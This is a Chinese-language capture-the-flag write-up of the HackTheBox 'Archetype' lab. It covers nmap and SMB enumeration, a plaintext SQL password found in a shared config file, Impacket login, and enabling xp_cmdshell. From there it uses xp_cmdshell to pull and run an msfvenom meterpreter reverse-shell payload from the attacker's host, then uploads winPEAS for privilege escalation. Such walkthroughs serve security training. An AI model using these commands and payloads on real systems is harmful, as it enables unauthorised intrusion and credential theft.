目標:Archetype
題目難度:本人覺得有難度
作者使用Kali Linux作為滲透測試平台,在Kali Linux上首先通過openvpn建立與Hackthebox網站的VPN連接,得到目標Archetype實例的IP地址:
#openvpn starting_point_jasonhuawen.ovpn
# nmap -sV 10.129.5.176
Task 1: Which TCP port is hosting a database server?
思路: 用nmap工具掃描一下目標Archetype,看數據庫服務運行的端口即可:
# nmap -sV 10.129.5.176 255 ⨯ Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-03 00:49 EDT Nmap scan report for 10.129.175.76 Host is up (0.22s latency). Not shown: 996 closed tcp ports (reset) PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds 1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000 Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 37.98 seconds
答案: 1433
Task 2: What is the name of the non-Administrative share available over SMB?
思路: 從nmap掃描結果可以知道目標運行共享服務,因此嘗試用smbclient列出共享目錄
# smbclient -L 10.129.5.176 Enter WORKGROUP\root's password: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin backups Disk C$ Disk Default share IPC$ IPC Remote IPC Reconnecting with SMB1 for workgroup listing.
# smbclient -L 10.129.5.176可以列出共享目錄,以$結尾的是管理員權限
答案: backups
Task 3: What is the password identified in the file on the SMB share?
思路: 然后用smbclient登錄上目標的backups目錄(沒有密碼)
#smbclient //10.129.5.176/backups
發現只有一個文件,下載到本地,查看,就可以看到有有用戶名和密碼信息:
# smbclient //10.129.5.176/backups 1 ⨯ Enter WORKGROUP\root's password: Try "help" to get a list of possible commands. smb: \> ls . D 0 Mon Jan 20 07:20:57 2020 .. D 0 Mon Jan 20 07:20:57 2020 prod.dtsConfig AR 609 Mon Jan 20 07:23:02 2020 5056511 blocks of size 4096. 2605198 blocks available smb: \> get prod.dtsConfig getting file \prod.dtsConfig of size 609 as prod.dtsConfig (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec) smb: \> quit ┌──(root💀kali)-[~] └─# cat prod.dtsConfig <DTSConfiguration> <DTSConfigurationHeading> <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/> </DTSConfigurationHeading> <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String"> <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue> </Configuration> </DTSConfiguration>
Username: ARCHETYPE\sql_svc
Password: M3g4c0rp123
答案:M3g4c0rp123
Task 4: What script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server?
思路: 接下來這道題,題目中提到了impacket工具,結果發現Kali Linux上沒有安裝,谷歌一下,安裝很簡單:
#git clone https://github.com/CoreSecurity/impacket.git
#cd impacket/
#python3 setup.py install
題目中是要建立與Microsoft SQL Server的連接,應該是mssqlclient.py腳本
接下來利用impacket中msclient.py腳本連接sqlserver 數據庫(用戶名與密碼用之前smbclient下載的文件中的相關信息)
#python3 mssqlclient.py ARCHETYPE/sql_svc@10.129.5.176 -windows-auth
成功進入數據庫
(root💀kali)-[/usr/share/doc/python3-impacket/examples] └─# ls addcomputer.py findDelegation.py getST.py lookupsid.py nmapAnswerMachine.py raiseChild.py rpcmap.py smbexec.py split.py atexec.py GetADUsers.py getTGT.py mimikatz.py ntfs-read.py rbcd.py sambaPipe.py smbpasswd.py ticketConverter.py dcomexec.py getArch.py GetUserSPNs.py mqtt_check.py ntlmrelayx.py rdp_check.py samrdump.py smbrelayx.py ticketer.py dpapi.py Get-GPPPassword.py goldenPac.py mssqlclient.py ping6.py registry-read.py secretsdump.py smbserver.py wmiexec.py esentutl.py GetNPUsers.py karmaSMB.py mssqlinstance.py ping.py reg.py services.py sniffer.py wmipersist.py exchanger.py getPac.py kintercept.py netview.py psexec.py rpcdump.py smbclient.py sniff.py wmiquery.py ┌──(root💀kali)-[/usr/share/doc/python3-impacket/examples] └─# python3 mssqlclient.py ARCHETYPE/sql_svc@10.129.5.176 -windows-auth Impacket v0.9.25.dev1+20220323.180407.ff322697 - Copyright 2021 SecureAuth Corporation Password: [*] Encryption required, switching to TLS [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'. [*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (140 3232) [!] Press help for extra shell commands SQL>
答案:mssqlclient.py
Task 5:What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell?
答案: xp_cmdshell
Task 6: What script can be used in order to search possible paths to escalate privileges on Windows hosts?
答案: winpeas(著名的windows信息枚舉以發現存在的漏洞)
Task 7: What file contains the administrator's password?
思路:需要加你反向shell並提權
SQL> enable_xp_cmdshell;
SQL> reconfigure
然后是設法建立反向代理連接,需要將載荷生成並上傳到目標機器,首先用msfenom生成載荷:
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.218 -f exe -o jason.exe #10.10.14.218是kali Linux 建立vpn連接后tun的地址,用於建立反向shell 1 ⨯ [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 354 bytes Final size of exe file: 73802 bytes Saved as: jason.exe
下面關鍵是如何把jason.exe payload上傳到目標機器
可以利用xp_cmsshell執行命令,將載荷下載到目標機器,在kali Linux本地運行http服務器(用python http模塊)
首先在目標機器上進入到有執行權限的目錄,比如Public目錄:
成功上傳載荷到目標機器:
SQL> xp_cmdshell "powershell wget http://10.10.14.8/jason.exe -OutFile c:\\Users\Public\\jason.exe"
然后在目標機器上執行腳本jason.exe
成功回連至Kali LInux
然后需要准備提權工具winPEAS,將該文件下載到Kali Linux本地
#wgethttps://github.com/carlospolop/PEASS-ng/releases/download/20220320/winPEASx86.exe
然后通過meterpreter將winpeas上傳到目標機器,並執行:
成功獲得user的flag: 3e7b102e78218e935bf3f4951fec21a3
